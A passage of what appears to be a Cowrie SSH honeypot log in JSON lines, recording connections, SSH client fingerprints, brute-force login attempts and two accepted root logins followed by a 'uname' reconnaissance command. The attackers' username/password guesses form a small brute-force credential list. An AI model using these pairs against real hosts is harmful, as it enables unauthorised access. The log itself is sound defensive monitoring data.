sh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T01:10:46.508516Z","src_ip":"212.227.235.229","session":"6feecd4f5bc0"}
{"eventid":"cowrie.login.failed","username":"fumeiling","password":"123","message":"login attempt [fumeiling/123] failed","sensor":"my-vps","timestamp":"2025-08-31T01:10:46.821721Z","src_ip":"212.227.235.229","session":"6feecd4f5bc0"}
{"eventid":"cowrie.login.failed","username":"dev","password":"12345","message":"login attempt [dev/12345] failed","sensor":"my-vps","timestamp":"2025-08-31T01:10:47.318491Z","src_ip":"212.227.125.160","session":"ccd2691c9585"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:47.891611Z","src_ip":"212.227.235.229","session":"6feecd4f5bc0"}
{"eventid":"cowrie.session.closed","duration":"3.6","message":"Connection lost after 3.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:48.732026Z","src_ip":"212.227.125.160","session":"ccd2691c9585"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":36454,"dst_ip":"1.2.3.4","dst_port":22,"session":"39057e9fe2ab","protocol":"ssh","message":"New connection: 212.227.125.160:36454 (1.2.3.4:22) [session: 39057e9fe2ab]","sensor":"my-vps","timestamp":"2025-08-31T01:10:53.540341Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:10:53.617604Z","src_ip":"212.227.125.160","session":"39057e9fe2ab"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:10:53.623751Z","src_ip":"212.227.125.160","session":"39057e9fe2ab"}
{"eventid":"cowrie.login.success","username":"root","password":"1qazXSW@","message":"login attempt [root/1qazXSW@] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:10:53.911781Z","src_ip":"212.227.125.160","session":"39057e9fe2ab"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:10:54.734387Z","src_ip":"212.227.125.160","session":"39057e9fe2ab"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:10:54.735110Z","src_ip":"212.227.125.160","session":"39057e9fe2ab"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:54.832704Z","src_ip":"212.227.125.160","session":"39057e9fe2ab"}
{"eventid":"cowrie.session.closed","duration":"1.3","message":"Connection lost after 1.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:10:54.834067Z","src_ip":"212.227.125.160","session":"39057e9fe2ab"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40790,"dst_ip":"1.2.3.4","dst_port":22,"session":"faf6a875f933","protocol":"ssh","message":"New connection: 212.227.125.160:40790 (1.2.3.4:22) [session: faf6a875f933]","sensor":"my-vps","timestamp":"2025-08-31T01:11:04.047297Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:11:04.048577Z","src_ip":"212.227.125.160","session":"faf6a875f933"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:11:04.122905Z","src_ip":"212.227.125.160","session":"faf6a875f933"}
{"eventid":"cowrie.login.failed","username":"svnuser","password":"svnuser","message":"login attempt [svnuser/svnuser] failed","sensor":"my-vps","timestamp":"2025-08-31T01:11:04.350049Z","src_ip":"212.227.125.160","session":"faf6a875f933"}
{"eventid":"cowrie.session.closed","duration":"1.4","message":"Connection lost after 1.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:05.492488Z","src_ip":"212.227.125.160","session":"faf6a875f933"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":41136,"dst_ip":"1.2.3.4","dst_port":22,"session":"6ac719ad5557","protocol":"ssh","message":"New connection: 212.227.235.229:41136 (1.2.3.4:22) [session: 6ac719ad5557]","sensor":"my-vps","timestamp":"2025-08-31T01:11:14.448941Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:11:14.450030Z","src_ip":"212.227.235.229","session":"6ac719ad5557"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":57816,"dst_ip":"1.2.3.4","dst_port":22,"session":"3e7e9be9b034","protocol":"ssh","message":"New connection: 212.227.125.160:57816 (1.2.3.4:22) [session: 3e7e9be9b034]","sensor":"my-vps","timestamp":"2025-08-31T01:11:14.477861Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:11:14.478770Z","src_ip":"212.227.125.160","session":"3e7e9be9b034"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:11:14.552889Z","src_ip":"212.227.125.160","session":"3e7e9be9b034"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-31T01:11:14.701545Z","src_ip":"212.227.235.229","session":"6ac719ad5557"}
{"eventid":"cowrie.login.failed","username":"ftpuser","password":"123456","message":"login attempt [ftpuser/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:11:14.777998Z","src_ip":"212.227.125.160","session":"3e7e9be9b034"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:15.940763Z","src_ip":"212.227.125.160","session":"3e7e9be9b034"}
{"eventid":"cowrie.session.closed","duration":"8.0","message":"Connection lost after 8.0 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:22.452666Z","src_ip":"212.227.235.229","session":"6ac719ad5557"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":59546,"dst_ip":"1.2.3.4","dst_port":22,"session":"77469a09a6c2","protocol":"ssh","message":"New connection: 212.227.125.160:59546 (1.2.3.4:22) [session: 77469a09a6c2]","sensor":"my-vps","timestamp":"2025-08-31T01:11:24.946619Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:11:24.947385Z","src_ip":"212.227.125.160","session":"77469a09a6c2"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:11:25.020665Z","src_ip":"212.227.125.160","session":"77469a09a6c2"}
{"eventid":"cowrie.login.failed","username":"ubuntu","password":"123456","message":"login attempt [ubuntu/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:11:25.414948Z","src_ip":"212.227.125.160","session":"77469a09a6c2"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:26.507574Z","src_ip":"212.227.125.160","session":"77469a09a6c2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":58896,"dst_ip":"1.2.3.4","dst_port":22,"session":"291a2bee3965","protocol":"ssh","message":"New connection: 212.227.235.229:58896 (1.2.3.4:22) [session: 291a2bee3965]","sensor":"my-vps","timestamp":"2025-08-31T01:11:28.374651Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:11:29.398567Z","src_ip":"212.227.235.229","session":"291a2bee3965"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T01:11:29.399347Z","src_ip":"212.227.235.229","session":"291a2bee3965"}
{"eventid":"cowrie.login.failed","username":"dev","password":"1234567","message":"login attempt [dev/1234567] failed","sensor":"my-vps","timestamp":"2025-08-31T01:11:34.825750Z","src_ip":"212.227.235.229","session":"291a2bee3965"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":35514,"dst_ip":"1.2.3.4","dst_port":22,"session":"9ee71161246e","protocol":"ssh","message":"New connection: 212.227.125.160:35514 (1.2.3.4:22) [session: 9ee71161246e]","sensor":"my-vps","timestamp":"2025-08-31T01:11:35.300613Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T01:11:35.301729Z","src_ip":"212.227.125.160","session":"9ee71161246e"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T01:11:35.375141Z","src_ip":"212.227.125.160","session":"9ee71161246e"}
{"eventid":"cowrie.login.success","username":"root","password":"QQ123456","message":"login attempt [root/QQ123456] succeeded","sensor":"my-vps","timestamp":"2025-08-31T01:11:35.650535Z","src_ip":"212.227.125.160","session":"9ee71161246e"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T01:11:35.953232Z","src_ip":"212.227.125.160","session":"9ee71161246e"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-31T01:11:35.954314Z","src_ip":"212.227.125.160","session":"9ee71161246e"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:36.029746Z","src_ip":"212.227.125.160","session":"9ee71161246e"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:36.031482Z","src_ip":"212.227.125.160","session":"9ee71161246e"}
{"eventid":"cowrie.session.closed","duration":"8.3","message":"Connection lost after 8.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:36.658443Z","src_ip":"212.227.235.229","session":"291a2bee3965"}
{"eventid":"cowrie.session.connect","src_ip":"102.88.137.80","src_port":1515,"dst_ip":"1.2.3.4","dst_port":22,"session":"ed3c9b37fc2a","protocol":"ssh","message":"New connection: 102.88.137.80:1515 (1.2.3.4:22) [session: ed3c9b37fc2a]","sensor":"my-vps","timestamp":"2025-08-31T01:11:39.008288Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:11:39.009310Z","src_ip":"102.88.137.80","session":"ed3c9b37fc2a"}
{"eventid":"cowrie.client.kex","hassh":"713bd9cc935561939c02dad25af2d3de","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes256-ctr,aes256-cbc,aes128-gcm@openssh.com,aes128-ctr,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes256-ctr","aes256-cbc","aes128-gcm@openssh.com","aes128-ctr","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 713bd9cc935561939c02dad25af2d3de","sensor":"my-vps","timestamp":"2025-08-31T01:11:39.131977Z","src_ip":"102.88.137.80","session":"ed3c9b37fc2a"}
{"eventid":"cowrie.login.failed","username":"andrew","password":"123456","message":"login attempt [andrew/123456] failed","sensor":"my-vps","timestamp":"2025-08-31T01:11:39.664735Z","src_ip":"102.88.137.80","session":"ed3c9b37fc2a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T01:11:40.790331Z","src_ip":"102.88.137.80","session":"ed3c9b37fc2a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":51700,"dst_ip":"1.2.3.4","dst_port":22,"session":"dccfc420c98b","protocol":"ssh","message":"New connection: 212.227.235.229:51700 (1.2.3.4:22) [session: dccfc420c98b]","sensor":"my-vps","timestamp":"2025-08-31T01:11:44.811962Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T01:11:44.818968Z","src_ip":"212.227.235.229","session":"dccfc420c98b"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com"